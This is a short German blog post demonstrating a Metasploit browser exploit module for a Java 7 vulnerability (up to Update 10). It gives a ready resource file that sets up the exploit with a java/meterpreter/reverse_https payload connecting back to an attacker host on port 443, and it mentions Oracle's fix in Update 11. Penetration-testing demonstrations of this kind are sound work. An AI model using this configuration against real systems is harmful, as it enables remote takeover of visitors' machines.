Für die neuentdeckte Java-Schwachstelle (bis Java-Version 7 Update 10) hat Rapid7 ein Modul entwickelt, das ich in diesem Blog kurz vorstellen will. Der Exploit sollte auf den gängigen Betriebssystemen (Windows, Linux und OSX) funktionieren. Als Payload habe ich java/meterpreter/reverse_https verwendet.
Zur einfacheren Handhabung kann man sich folgende Resource-Datei erstellen.
use exploit/multi/browser/java_jre17_jmxbean
set srvport 80
set uripath /
set payload java/meterpreter/reverse_https
set lport 443
set lhost 192.168.111.215
show options
Der Exploit ist nicht für ältere Versionen von Java geeignet (Java 6 und jünger). Diese Versionen sind aber mit anderen Schwachstellen behaftet.
Ein kurzes Video findet man hier:
[youtube 1VCXEcnLd3U 540 380]
Oracle hat eine Update (Version 7 Update 11) bereitgestellt, dass die Schwachstelle bereinigen soll.